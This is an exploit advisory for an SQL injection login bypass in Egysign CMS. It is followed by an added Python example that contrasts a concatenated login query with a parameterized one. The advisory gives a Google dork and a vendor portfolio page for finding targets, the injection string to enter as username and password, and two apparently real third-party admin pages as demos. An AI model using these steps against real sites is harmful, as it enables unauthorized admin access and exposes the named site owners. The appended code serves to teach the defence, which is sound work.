# Exploit Title : Egysign CMS Authentication Bypass
# Date : 02/04/2015
# Exploit Author : WH!T3 W01F
# Contact : whit3_w01f@att.net
# Category : Web Application Bugs
# Home : Iran-Cyber.Org - Iran-Cyber.In
# Google Dork : intext:powered By Egysign
# Tested On : Windows
1. Description
With This Vulnerability You Can Bypass Authentication And Log In As An Admin.
2. Proof Of Concept
You Can Find Targets In 2 Ways :
First Way :
Go To This Address : http://egysign.com/Portfolio.aspx
Many Targets Are Listed At That Address. After You Have Selected Your Target, Use This Exploit :
# http://site.com/admin
Then, If The Admin Page Comes Up, Use These Usernames And Passwords :
Username : '=''or'
Password : '=''or'
Second Way :
Search This Dork : intext:powered By Egysign
Then Use This Exploit :
# http://site.com/admin
Then, If The Admin Page Comes Up, Use These Usernames And Passwords :
Username : '=''or'
Password : '=''or'
# Demo :
# http://diverprofessional.co.uk/admin/
# http://www.injazsys.com/admin/
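
Added example, not code from this advisory or from Egysign: it assumes the bypass comes from a login query built by string concatenation (the advisory does not show the CMS code) and shows how the `'=''or'` string changes that query's structure, next to a login that binds the username as a parameter and compares a salted hash. The table, column and function names are hypothetical, and the sample row is constructed.

```python
import hashlib
import hmac
import os
import re
import sqlite3

PAYLOAD = "'=''or'"  # username/password string from the proof of concept

def concat_query(username, password):
    # Vulnerable pattern (assumed): user input pasted straight into the SQL text.
    return ("SELECT id FROM admins WHERE username = '" + username +
            "' AND password = '" + password + "'")

def sql_skeleton(sql):
    # Replace each '...' literal ('' inside a literal is an escaped quote) with ?
    # so that only the statement's syntax is left.
    return re.sub(r"'(?:[^']|'')*'", "?", sql)

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def make_db():
    # Constructed sample data: one admin row with a salted password hash.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, "
                 "username TEXT UNIQUE, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admins (username, salt, pw_hash) VALUES (?, ?, ?)",
                 ("admin", salt, hash_pw("constructed-sample-password", salt)))
    return conn

def login(conn, username, password):
    # Hardened form: the username is bound as a parameter, so its quotes stay data,
    # and the password never enters the SQL text at all.
    row = conn.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(hash_pw(password, row[0]), row[1])

if __name__ == "__main__":
    print(sql_skeleton(concat_query("admin", "guess")))
    print(sql_skeleton(concat_query(PAYLOAD, PAYLOAD)))
    db = make_db()
    print(login(db, PAYLOAD, PAYLOAD), login(db, "admin", "constructed-sample-password"))
```

The first skeleton printed is the intended statement; the second carries extra `=` and `or` operators that came from the input, which is the change parameter binding prevents.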
=========================================
Greetz : | root3r | MOHAMAD_NOFOZI | Sheytan Azzam | KamraN HellisH | JOK3R | Erfan Mig | Alireza_ProMis | Mr.Moein | Pi.Hack | CRYSIS | Siyahi |